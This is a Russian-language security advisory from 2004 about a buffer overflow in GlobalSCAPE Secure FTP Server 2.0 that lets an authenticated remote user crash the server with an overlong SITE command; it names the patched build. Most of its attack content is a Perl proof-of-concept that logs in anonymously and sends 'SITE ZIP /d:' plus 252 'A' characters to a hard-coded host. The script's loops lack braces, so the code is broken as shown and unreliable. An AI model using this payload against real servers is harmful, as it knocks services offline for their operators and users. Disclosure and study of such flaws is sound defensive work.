| Дата публикации: | 19.03.2004 |
| Всего просмотров: | 1295 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | GlobalSCAPE Secure FTP Server 2.x |
| Уязвимые версии: GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2
Описание: Переполнение буфера обнаружено в GlobalSCAPE Secure FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера. Удаленный авторизованный пользователь может послать специально сформированную команду SITE, с параметром ~252 байта, чтобы перезаписать память и аварийно завершить работу сервера. Пример/Эксплоит:
#!/usr/bin/perl
use IO::Socket;
$host = "192.168.1.243";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "2117");
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while (<$remote>)
print $_;
if (/220 /)
{
last;
}
$remote->autoflush(1);
my $ftp = "USER anonymous\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
print $_;
if (/331 /)
{
last;
}
$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
print $_;
if (/230 /)
{
last;
}
$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
print $_;
if (/250 Done/)
{
last;
}
close $remote;
URL производителя: http://www.cuteftp.com/gsftps/ Решение:Установите обновленную версию программы (2.0 Build 03.16.2004.1) |
|
| Ссылки: | GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling) |